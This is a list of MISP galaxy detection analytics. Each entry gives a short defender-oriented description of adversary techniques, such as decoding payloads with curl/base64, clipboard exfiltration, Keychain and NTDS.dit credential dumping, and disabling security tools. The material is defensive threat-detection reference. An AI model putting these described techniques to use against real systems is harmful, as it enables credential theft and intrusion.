Internal MISP references

UUID 8180320e-ab62-44e5-afae-eba6ba23d769 which can be used as unique global reference for Analytic 0687 - AN0687 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0687
mitre_platforms ['Windows']

Analytic 0768 - AN0768

The adversary uses native utilities like base64, gzip, tar, or openssl to decode, decompress, or decrypt files that were previously staged or downloaded. These tools may be chained with curl/wget and executed via bash/zsh, often to extract an embedded payload or reverse shell script.

Internal MISP references

UUID c4866ad5-310c-4a72-89b5-1e5a8683d286 which can be used as unique global reference for Analytic 0768 - AN0768 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0768
mitre_platforms ['Linux']

Analytic 0786 - AN0786

Detection of suspicious token manipulation chains: use of token-related APIs (e.g., LogonUser, DuplicateTokenEx) or commands (runas) → spawning of a new process under a different security context (e.g., SYSTEM) → mismatched parent-child process lineage or anomalies in Event Tracing for Windows (ETW) token/PPID data → abnormal lateral or privilege escalation activity.

Internal MISP references

UUID c4cabd45-86a2-4842-9171-dff93f6ac737 which can be used as unique global reference for Analytic 0786 - AN0786 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0786
mitre_platforms ['Windows']

Analytic 0769 - AN0769

The adversary invokes built-in scripting or decoding tools like base64, plutil, or AppleScript-based utilities to decode files embedded in staging artifacts. Decoding often occurs post-download or as part of post-exploitation payload deployment via zsh, python, or osascript.

Internal MISP references

UUID 0029e7e7-d42c-4a91-8d00-6bf6fd72962f which can be used as unique global reference for Analytic 0769 - AN0769 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0769
mitre_platforms ['macOS']

Analytic 0679 - AN0679

Database enumeration and export activity (e.g., SELECT * FROM, SHOW DATABASES) issued via ephemeral VMs, admin APIs, or cloud shell from non-monitoring accounts. Defender correlates audit logs (CloudTrail, GCP Admin, AzureDiagnostics), storage write ops, and cross-region transfers by identities not tied to DB operations.

Internal MISP references

UUID 041812fa-5446-47cc-8ca0-1106f4874c10 which can be used as unique global reference for Analytic 0679 - AN0679 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0679
mitre_platforms ['IaaS']

Analytic 0796 - AN0796

Monitor Office Suite applications (Outlook, Word mail merge, Excel macros) for abnormal automated message sending, especially when macros or scripts trigger email delivery. Detect patterns of impersonation language (urgent, payment, executive request) combined with anomalous execution of Office macros.

Internal MISP references

UUID 250d2977-7b94-4041-a299-0f2f1532eb95 which can be used as unique global reference for Analytic 0796 - AN0796 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0796
mitre_platforms ['Office Suite']

Analytic 0697 - AN0697

Monitors API calls and service-specific logs for enumeration of organizational roles, permissions, and group structure, particularly outside of normal admin behavior baselines.

Internal MISP references

UUID 54ae99be-c089-4e96-97f5-52af2892ae25 which can be used as unique global reference for Analytic 0697 - AN0697 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0697
mitre_platforms ['SaaS']

Analytic 0976 - AN0976

Monitor audit logs for setuid/setgid bit changes, executions where UID ≠ EUID (indicative of sudo or privilege escalation), and high-integrity binaries launched by unprivileged users.

Internal MISP references

UUID 90a8d89c-f54a-49dd-8734-6f85e5e3a2a5 which can be used as unique global reference for Analytic 0976 - AN0976 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0976
mitre_platforms ['Linux']

Analytic 0967 - AN0967

Detection of xclip or xsel access to clipboard buffers outside of user terminal context, especially when chained to staging (gzip, base64) or network exfiltration (curl, scp).

Internal MISP references

UUID ab9a4c72-f7ce-4721-8c9f-c5d9c966b600 which can be used as unique global reference for Analytic 0967 - AN0967 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0967
mitre_platforms ['Linux']

Analytic 0868 - AN0868

Detection of inconsistencies between reported sensor health and actual process/service state. For example, Windows Defender tray icon/UI showing healthy status while corresponding Defender services (WinDefend, MsMpEng) are stopped or disabled. Correlates process creation events with missing or terminated security processes and spoofed health events.

Internal MISP references

UUID 0f4ec296-008e-42aa-95b2-6e4e351d730c which can be used as unique global reference for Analytic 0868 - AN0868 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0868
mitre_platforms ['Windows']

Analytic 0688 - AN0688

Detection of unauthorized keylogger behavior through access to /dev/input, loading kernel modules (e.g., via insmod), or polling user input devices from non-user shells

Internal MISP references

UUID 1a13d795-7c26-44b6-ad1b-2ad732dc33c3 which can be used as unique global reference for Analytic 0688 - AN0688 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0688
mitre_platforms ['Linux']

Analytic 0886 - AN0886

Unusual service stop events, termination of AV/EDR processes, registry modifications disabling security tools, and firewall/defender configuration changes. Correlate process creation with service stop requests and registry edits.

Internal MISP references

UUID febc685b-997f-4095-b60b-5dfeefe01ae3 which can be used as unique global reference for Analytic 0886 - AN0886 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0886
mitre_platforms ['Windows']

Analytic 0698 - AN0698

User-initiated installation of Python (pip), NodeJS (npm), or other language libraries, followed by unexpected network connections, credential access, or startup file modifications. Defender sees pip install or npm install commands run by a non-root user, followed shortly by new .py, .sh, or .js files in hidden directories, or interpreter-based execution during boot/login.

Internal MISP references

UUID 223a39c8-d194-456e-be99-2db9e97ab7da which can be used as unique global reference for Analytic 0698 - AN0698 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0698
mitre_platforms ['Linux']

Analytic 0968 - AN0968

Execution of hh.exe to open a .chm file followed by suspicious child processes or script engine invocation (VBScript, JScript, mshta, powershell). Behavior includes loading a CHM file from untrusted locations, or immediately spawning commands indicative of payload execution.

Internal MISP references

UUID 23e84bf6-70d1-4c49-97b8-0fff9c6efa8f which can be used as unique global reference for Analytic 0968 - AN0968 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0968
mitre_platforms ['Windows']

Analytic 0689 - AN0689

Processes accessing TCC-protected input APIs or polling HID services without user interaction, or dynamically loaded keylogging frameworks using accessibility privileges

Internal MISP references

UUID 7d5eb9bd-5e53-4cf8-b86d-7136bbf8f673 which can be used as unique global reference for Analytic 0689 - AN0689 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0689
mitre_platforms ['macOS']

Analytic 0896 - AN0896

Processes like git, curl, or python scripts executing commands that package files (tar, gzip) followed by HTTPS uploads to code repository endpoints. Defender view: detect unusual git push activity or scripted HTTPS requests outside normal developer work hours.

Internal MISP references

UUID 8049e0b4-961b-499f-9204-45fa9b7117be which can be used as unique global reference for Analytic 0896 - AN0896 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0896
mitre_platforms ['Linux']

Analytic 0986 - AN0986

Detects malicious containers or pods using names, labels, or namespaces that mimic legitimate workloads; also checks for image layer mismatches and unauthorized resource deployments.

Internal MISP references

UUID c9bdc7a6-ff19-46e9-a534-fa2fd3e0a193 which can be used as unique global reference for Analytic 0986 - AN0986 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0986
mitre_platforms ['Containers']

Analytic 0869 - AN0869

Monitoring for discrepancies between system daemon/service state and reported health messages (e.g., syslog shows AV/IDS daemon stopped, but spoofed messages claim it is still running). Detects userland processes impersonating AV/IDS command-line outputs or modifying log forwarding configurations.

Internal MISP references

UUID d1feb97f-3683-49f5-b5a8-b54d58de3444 which can be used as unique global reference for Analytic 0869 - AN0869 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0869
mitre_platforms ['Linux']

Analytic 0699 - AN0699

Execution of pip.exe, npm.cmd, or MSI installers within user context, followed by script interpreter startup (e.g., python.exe) or PowerShell with unusual child processes or file writes in %APPDATA%, %TEMP%, or %LOCALAPPDATA%. Defender correlates command-line install tools with Sysmon and Event Logs to trace downstream behavior.

Internal MISP references

UUID 05985fc7-44cf-4b28-8d4f-14c1662bc5ea which can be used as unique global reference for Analytic 0699 - AN0699 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0699
mitre_platforms ['Windows']

Analytic 0969 - AN0969

High-volume packet generation by local processes (e.g., PowerShell, cmd, curl.exe) or network service processes resulting in excessive outbound traffic over short time window, correlated with abnormal resource usage or degraded host responsiveness.

Internal MISP references

UUID 0de81d5a-ffba-4eba-915d-c4f4d8b30f9a which can be used as unique global reference for Analytic 0969 - AN0969 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0969
mitre_platforms ['Windows']

Analytic 0996 - AN0996

Monitors execution of older or legacy interpreters (e.g., python2, bash with restricted history logging), downgrade of TLS/SSL configurations, or forced fallback to unencrypted protocols. Detects suspicious reconfiguration of kernel modules or boot loaders to reduce integrity controls.

Internal MISP references

UUID 54eb86ed-2a72-41a8-b060-2750c2fee758 which can be used as unique global reference for Analytic 0996 - AN0996 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0996
mitre_platforms ['Linux']

Analytic 0777 - AN0777

Unexpected firmware image uploads via TFTP/FTP/SCP. Configuration changes modifying boot image pointers. Logs showing boot variable redirection to non-standard images. Anomalous reboots immediately following firmware changes not tied to patch schedules.

Internal MISP references

UUID e64aebfd-8343-45ec-bdce-6681a8255637 which can be used as unique global reference for Analytic 0777 - AN0777 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0777
mitre_platforms ['Network Devices']

Analytic 0877 - AN0877

Detects enabling of interface sniffing via packet capture tools or AppleScript triggering tcpdump. Leverages Unified Logs and process lineage to identify suspicious use of pfctl, tcpdump, or libpcap libraries.

Internal MISP references

UUID 31098e90-e2a0-477f-80ca-e969430d54c2 which can be used as unique global reference for Analytic 0877 - AN0877 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0877
mitre_platforms ['macOS']

Analytic 0787 - AN0787

Unexpected processes (e.g., powershell.exe, wscript.exe, office apps) initiating HTTP POST/PUT requests to text storage domains like pastebin.com or hastebin.com, particularly when preceded by file access in sensitive directories. Defender perspective: correlation of process lineage, large clipboard/file read operations, and outbound uploads to text storage services.

Internal MISP references

UUID 4e8da615-4d12-4b53-8c7b-06d7c41e22a9 which can be used as unique global reference for Analytic 0787 - AN0787 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0787
mitre_platforms ['Windows']

Analytic 0778 - AN0778

Monitor for abnormal creation or modification of Windows services (e.g., via sc.exe, PowerShell, or API calls) that load non-standard executables. Correlate registry changes in service keys with service creation events and process execution to detect service abuse for persistence or execution.

Internal MISP references

UUID 667c21d2-2f92-42d6-aaea-b46974f63c8d which can be used as unique global reference for Analytic 0778 - AN0778 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0778
mitre_platforms ['Windows']

Analytic 0797 - AN0797

Cause→effect chain: (1) A client app (browser, Office, PDF/Flash/reader) experiences a crash/abnormal exit or loads from an unusual location, then (2) drops or modifies a file in user-writable paths, and/or (3) spawns an unexpected child (e.g., powershell/cmd/mshta/rundll32/wscript/installer), and (4) establishes outbound C2-like connections shortly after. Correlate application logs, file writes, process lineage, and network egress within a short window.

Internal MISP references

UUID 065f2c96-6903-4cd1-a737-99ecf1fdc73e which can be used as unique global reference for Analytic 0797 - AN0797 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0797
mitre_platforms ['Windows']

Analytic 0779 - AN0779

Detect unusual invocations of systemctl, service, or init scripts creating or modifying daemons. Monitor audit logs for execution of binaries from unexpected paths linked to service start/stop activity.

Internal MISP references

UUID 65691cb3-a2b3-4c48-91d2-7088a047ebef which can be used as unique global reference for Analytic 0779 - AN0779 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0779
mitre_platforms ['Linux']

Analytic 0977 - AN0977

Detect execution of /usr/libexec/security_authtrampoline or use of AuthorizationExecuteWithPrivileges API, and monitor process lineage for unusual launches of GUI apps with escalated privileges.

Internal MISP references

UUID d8b422b3-50e7-48cc-bfa1-a6e0cecf5761 which can be used as unique global reference for Analytic 0977 - AN0977 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0977
mitre_platforms ['macOS']

Analytic 0887 - AN0887

Execution of commands that stop or kill processes associated with logging or security daemons (auditd, syslog, falco). Detect modifications to iptables or disabling SELinux/AppArmor enforcement. Correlate sudo/root context with abrupt service halts.

Internal MISP references

UUID 003dd2ae-b156-4ebd-8a59-76f993056552 which can be used as unique global reference for Analytic 0887 - AN0887 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0887
mitre_platforms ['Linux']

Analytic 0878 - AN0878

Detects creation of traffic mirroring sessions (e.g., AWS VPC Traffic Mirroring, Azure vTAP) that redirect traffic from critical assets to other virtual instances, often followed by file creation or session establishment.

Internal MISP references

UUID 4c4941eb-b087-4710-8c88-ff537c2309ff which can be used as unique global reference for Analytic 0878 - AN0878 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0878
mitre_platforms ['IaaS']

Analytic 0788 - AN0788

Use of curl, wget, or custom scripts to POST data to pastebin-like services. Defender perspective: identify chained behavior where files are compressed/read followed by HTTPS POST requests to text-sharing endpoints.

Internal MISP references

UUID dd202a3f-c73b-47cf-9689-f14a8def816e which can be used as unique global reference for Analytic 0788 - AN0788 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0788
mitre_platforms ['Linux']

Analytic 0879 - AN0879

Detects execution of capture commands via CLI (monitor capture, debug packet, etc.) or unauthorized CLI access followed by logging configuration changes on Cisco/Juniper/Arista gear.

Internal MISP references

UUID 25403649-ce66-4fb0-9957-8c319b10e9d7 which can be used as unique global reference for Analytic 0879 - AN0879 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0879
mitre_platforms ['Network Devices']

Analytic 0978 - AN0978

Monitor for unexpected privilege elevation operations via SAML assertion manipulation, role injection, or changes to identity mappings that result in access escalation.

Internal MISP references

UUID 6385ccc0-f1a9-4198-997e-dec943e88db7 which can be used as unique global reference for Analytic 0978 - AN0978 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0978
mitre_platforms ['Identity Provider']

Analytic 0897 - AN0897

Office or scripting applications initiating unusual HTTPS traffic to code repository APIs with high outbound-to-inbound ratios. Defender perspective: monitor for sensitive file access in combination with network connections to github.com, gitlab.com, or bitbucket.org.

Internal MISP references

UUID 70b2ab8e-f18e-4cb5-8149-4ba2c334df69 which can be used as unique global reference for Analytic 0897 - AN0897 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0897
mitre_platforms ['macOS']

Analytic 0798 - AN0798

Cause→effect chain: (1) Browser/Office/reader process logs crash/segfault or abnormal sandbox message, (2) new executable/script/write occurs in $HOME (Downloads, ~/.cache, /tmp), (3) unexpected child like curl/wget/bash/python opens network connections soon after.

Internal MISP references

UUID b3b58ac5-6b60-4c34-9842-46f5ee517bcb which can be used as unique global reference for Analytic 0798 - AN0798 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0798
mitre_platforms ['Linux']

Analytic 0789 - AN0789

Processes such as osascript, curl, or office applications sending data to text storage APIs/domains. Defender perspective: anomalous clipboard or file reads by unexpected applications immediately followed by outbound HTTPS requests to pastebin-like services.

Internal MISP references

UUID cf74f802-0080-41ff-8745-9c42af313462 which can be used as unique global reference for Analytic 0789 - AN0789 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0789
mitre_platforms ['macOS']

Analytic 0987 - AN0987

Detects VIBs, scripts, or binaries placed into directories like /bin or /etc/vmware with names mimicking standard ESXi components. Also monitors unauthorized creation of services.

Internal MISP references

UUID d16be21c-6df4-4648-91cd-36152dafa38d which can be used as unique global reference for Analytic 0987 - AN0987 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0987
mitre_platforms ['ESXi']

Analytic 0997 - AN0997

Detection of execution of legacy scripting runtimes (e.g., older versions of Python, Bash, or PowerShell Core) lacking auditing. Monitoring for changes to EFI or system boot files indicative of downgrade-based persistence or bypass of integrity features.

Internal MISP references

UUID 08a391a7-1ce6-4f11-b060-fca06ef03328 which can be used as unique global reference for Analytic 0997 - AN0997 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0997
mitre_platforms ['macOS']

Analytic 0799 - AN0799

Cause→effect chain: (1) App crash/abnormal termination in unified logs for Safari/Chrome/Office/Preview, (2) new files/scripts in ~/Library, ~/Downloads, /private/var/folders/*, (3) unexpected child (osascript, zsh, bash, curl) spawned by those apps, (4) new outbound connections.

Internal MISP references

UUID 4aaf0a98-c6a9-4b30-a9d9-3a014473bd0e which can be used as unique global reference for Analytic 0799 - AN0799 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0799
mitre_platforms ['macOS']

Analytic 0979 - AN0979

Detect sudden privilege escalations such as IAM role changes, user-assigned privilege boundaries, or elevation via assumed roles beyond normal behavior.

Internal MISP references

UUID 9465ea54-a81a-4d00-a75d-e0b7f3392bb8 which can be used as unique global reference for Analytic 0979 - AN0979 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0979
mitre_platforms ['IaaS']

Analytic 0888 - AN0888

Execution of commands or APIs that disable Gatekeeper, XProtect, or system integrity protections. Detect configuration changes through unified logs. Monitor termination of system security daemons (e.g., syspolicyd).

Internal MISP references

UUID fb51dd4c-b751-4282-a447-d9f5f257b435 which can be used as unique global reference for Analytic 0888 - AN0888 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0888
mitre_platforms ['macOS']

Analytic 0988 - AN0988

Identifies suspicious outbound traffic volume mismatches from processes that typically do not generate network activity, particularly over C2 protocols like HTTPS, DNS, or custom TCP/UDP ports, following file or data access.

Internal MISP references

UUID 28c16139-9ce1-4dd7-b26a-e257f37e246c which can be used as unique global reference for Analytic 0988 - AN0988 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0988
mitre_platforms ['Windows']

Analytic 0889 - AN0889

Modification of container runtime security profiles (AppArmor, seccomp) or removal of monitoring agents within containers. Detect unauthorized mounting/unmounting of host /proc or /sys to disable logging or auditing.

Internal MISP references

UUID 2a4f23d7-3f80-45b7-90ec-b13fdd7f8d70 which can be used as unique global reference for Analytic 0889 - AN0889 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0889
mitre_platforms ['Containers']

Analytic 0898 - AN0898

ESXi host processes (vmx, hostd) initiating HTTPS sessions toward external code repositories. Defender perspective: detect datastore reads followed by outbound web traffic inconsistent with administrative baselines.

Internal MISP references

UUID e18f0682-6610-4ba8-8159-a4afea3b7974 which can be used as unique global reference for Analytic 0898 - AN0898 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0898
mitre_platforms ['ESXi']

Analytic 0899 - AN0899

Adversaries create user accounts via identity provider APIs or admin portals (e.g., Azure AD, Okta). These accounts may be assigned elevated privileges or used in chained authentication. Detection monitors Add User activity from suspicious IPs or automation sources, followed by role/permission escalation.

Internal MISP references

UUID 668f1c2b-1a5e-4269-92d9-f7126764dd4e which can be used as unique global reference for Analytic 0899 - AN0899 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0899
mitre_platforms ['Identity Provider']

Analytic 0989 - AN0989

Monitors for processes reading sensitive files then immediately initiating unusual outbound connections or bulk transfer sessions over persistent sockets, particularly with encrypted or binary payloads.

Internal MISP references

UUID 6914dd62-46a6-4de4-9c0b-afe1cb5b075d which can be used as unique global reference for Analytic 0989 - AN0989 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0989
mitre_platforms ['Linux']

Analytic 0998 - AN0998

Linux permission escalation behavioral chain: (1) Process creation of permission modification utilities (chmod, chown, chgrp, setfacl) with suspicious parameters indicating privilege escalation intent, (2) System call analysis revealing direct file metadata manipulation (chmod, fchmod, chown, fchown syscalls), (3) Extended attribute and ACL modifications targeting critical system paths, (4) Temporal correlation with subsequent file access or process execution from modified locations, (5) Anomalous permission patterns deviating from system baselines

Internal MISP references

UUID 971ddd36-1ecd-46bf-b94c-22e8f05c1462 which can be used as unique global reference for Analytic 0998 - AN0998 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0998
mitre_platforms ['Linux']

Analytic 0999 - AN0999

macOS permission and attribute manipulation behavioral chain: (1) Process execution of permission utilities (chmod, chown, chgrp) or macOS-specific tools (chflags) with suspicious parameters, (2) System Integrity Protection (SIP) bypass attempts through permission modifications, (3) File flags manipulation (uchg, schg, hidden) for evasion or persistence, (4) Extended attribute (xattr) modifications affecting security metadata, (5) Unified log correlation with file system events and subsequent access patterns, (6) Gatekeeper and code signing bypass through permission/attribute manipulation

Internal MISP references

UUID 2d21fb1f-f9c3-4e72-a6dd-3d7872be3294 which can be used as unique global reference for Analytic 0999 - AN0999 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0999
mitre_platforms ['macOS']

Analytic 1111 - AN1111

Detects abuse of AuthorizationExecuteWithPrivileges API to gain elevated privileges via user credential prompts, typically through invocation of /usr/libexec/security_authtrampoline. Detection involves correlation of API usage, binary reputation, and prompt context.

Internal MISP references

UUID aae53d47-1f26-426b-9e50-848f186fed99 which can be used as unique global reference for Analytic 1111 - AN1111 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1111
mitre_platforms ['macOS']

Analytic 1112 - AN1112

Detects suspicious access to macOS Keychain files and APIs. Observes processes invoking the 'security' utility or accessing Keychain databases directly, correlates these with abnormal parent process lineage or unexpected user context. Monitors attempts to dump, unlock, or read credential storage beyond normal application workflows.

Internal MISP references

UUID 015260e0-432e-4eaf-978e-b1a32fa6af6a which can be used as unique global reference for Analytic 1112 - AN1112 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1112
mitre_platforms ['macOS']

Analytic 1211 - AN1211

Modification or replacement of service executables due to weak file or directory permissions. Defender observes file writes to service binary paths, unexpected modifications of executables associated with registered services, and subsequent service execution of attacker-supplied binaries under elevated permissions.

Internal MISP references

UUID 0a847430-f140-419e-b0fe-bd891bde85a6 which can be used as unique global reference for Analytic 1211 - AN1211 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1211
mitre_platforms ['Windows']

Analytic 1121 - AN1121

Detects high-frequency or anomalous DNS queries initiated by non-browser, non-system processes (e.g., PowerShell, rundll32, python.exe) used to establish command and control via DNS tunneling.

Internal MISP references

UUID 407bb9c9-0c31-4172-8dd3-bdd0547f2d1e which can be used as unique global reference for Analytic 1121 - AN1121 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1121
mitre_platforms ['Windows']

Analytic 1113 - AN1113

Detection of automated tools or scripts periodically transmitting data to external destinations using scheduled tasks or background processes.

Internal MISP references

UUID 4a92d2e9-fc28-4eac-9b3d-113e74d7bf2d which can be used as unique global reference for Analytic 1113 - AN1113 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1113
mitre_platforms ['Windows']

Analytic 1131 - AN1131

Configuration changes to virtual TAP/mirror policies that forward traffic to unapproved destinations. Detection correlates management plane API calls with mirrored traffic observation.

Internal MISP references

UUID 7becb616-f907-4533-a425-08ca42440e3f which can be used as unique global reference for Analytic 1131 - AN1131 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1131
mitre_platforms ['IaaS']

Analytic 1311 - AN1311

Monitors Mail.app database or maildir file access, automation via AppleScript, and abnormal mail rule creation using scripting or UI automation frameworks.

Internal MISP references

UUID ae581308-5c1f-40b9-ae6e-51c375821476 which can be used as unique global reference for Analytic 1311 - AN1311 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1311
mitre_platforms ['macOS']

Analytic 1114 - AN1114

Background scripts (e.g., via cron) or daemons transmitting data repeatedly to remote IPs or URLs.

Internal MISP references

UUID 31adce9b-8935-4abf-aaf2-0a13047e25e4 which can be used as unique global reference for Analytic 1114 - AN1114 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1114
mitre_platforms ['Linux']

Analytic 1411 - AN1411

Adversary mounts external drive to /media or /mnt then accesses or copies targeted data via shell, cp, or tar.

Internal MISP references

UUID 5312ddd0-dd58-4bcb-afc0-7a05a6b2df42 which can be used as unique global reference for Analytic 1411 - AN1411 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1411
mitre_platforms ['Linux']

Analytic 1141 - AN1141

Spoofed outbound packets sent to amplification services from command-line tools or scripts, combined with abnormal outbound packet volume on known reflector ports

Internal MISP references

UUID eb7692b0-5592-4d23-ba06-fdded48a2a0d which can be used as unique global reference for Analytic 1141 - AN1141 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1141
mitre_platforms ['Linux']

Analytic 1115 - AN1115

Observation of LaunchAgents or LaunchDaemons establishing periodic external connections indicative of automated data transfer.

Internal MISP references

UUID 031ed94b-50d9-451e-a853-29ee8d845773 which can be used as unique global reference for Analytic 1115 - AN1115 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1115
mitre_platforms ['macOS']

Analytic 1151 - AN1151

Inspect network telemetry for adversary attempts to blend malicious traffic with legitimate flows using VPNs, proxies, or geolocation spoofing. Defensive teams may observe anomalous tunnels, encrypted sessions to suspicious domains, or geo-mismatched IP activity.

Internal MISP references

UUID 3f74d068-0a8b-4312-91f3-34da6c630c4a which can be used as unique global reference for Analytic 1151 - AN1151 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1151
mitre_platforms ['Network Devices']

Analytic 1511 - AN1511

Processes that normally do not initiate network communications suddenly making outbound HTTPS connections with high outbound-to-inbound data ratios. Defender view: correlation between process creation logs (e.g., Word, Excel, PowerShell) and subsequent anomalous network traffic volumes toward common web services (Dropbox, Google Drive, OneDrive).

Internal MISP references

UUID 81b1e9a7-b6f4-4cca-b07a-3498ab4abd4a which can be used as unique global reference for Analytic 1511 - AN1511 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1511
mitre_platforms ['Windows']

Analytic 1611 - AN1611

Detects credential dumping attempts targeting the NTDS.dit database by monitoring shadow copy creation, suspicious file access to %SystemRoot%\NTDS\ntds.dit, and the use of tooling like ntdsutil.exe or volume management APIs.

Internal MISP references

UUID 1c715030-9564-482d-98b7-22072bf28c97 which can be used as unique global reference for Analytic 1611 - AN1611 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1611
mitre_platforms ['Windows']

Analytic 1161 - AN1161

Command-line tools (e.g., curl, rsync, wget, or custom Python scripts) used to scrape documentation systems or internal REST APIs. Unusual access patterns to knowledge base folders or shared team drives.

Internal MISP references

UUID 59faf79f-831d-436b-9ce3-e5c1d338da6c which can be used as unique global reference for Analytic 1161 - AN1161 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1161
mitre_platforms ['Linux']

Analytic 1116 - AN1116

Office-based persistence via Office template macros, Outlook forms/rules/homepage, or registry-persistent scripts. Adversary modifies registry keys or Office application directories to load malicious scripts at startup.

Internal MISP references

UUID e643c4aa-dc7d-43d9-b36e-f13d733f8e9a which can be used as unique global reference for Analytic 1116 - AN1116 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1116
mitre_platforms ['Windows']

Analytic 1117 - AN1117

Startup-based persistence mechanisms within Microsoft Office Suite like template macros and home page redirects being configured through internal automation or client-side settings.

Internal MISP references

UUID 59bfb473-611f-4443-9d11-f44e7ace93fb which can be used as unique global reference for Analytic 1117 - AN1117 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1117
mitre_platforms ['Office Suite']

Analytic 1171 - AN1171

Detects Automator, AppleScript, or Terminal executing curl, lftp, or TFTP for binary transfer to untrusted IPs or unusual ports.

Internal MISP references

UUID 9e9efdc0-82d3-4046-a4db-e97454f708a6 which can be used as unique global reference for Analytic 1171 - AN1171 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1171
mitre_platforms ['macOS']

Analytic 1711 - AN1711

The user can see persistent notifications in their notification drawer and can subsequently uninstall applications that do not belong. Applications could be vetted for their use of the startForeground() API, and could be further scrutinized if usage is found.

Internal MISP references

UUID 2df1959e-8ec4-4193-9cb8-c089c78b4d1c which can be used as unique global reference for Analytic 1711 - AN1711 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1711
mitre_platforms ['Android']

Analytic 1181 - AN1181

Use ESXi syslogs to track abnormal DNS query patterns from management agents or VMs. Identify high-frequency, low-TTL, or unresolvable domains as suspicious. Correlate with unusual management plane process activity.

Internal MISP references

UUID 5a652a8f-a8e1-4010-bc2b-2ffaa2838333 which can be used as unique global reference for Analytic 1181 - AN1181 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1181
mitre_platforms ['ESXi']

Analytic 1118 - AN1118

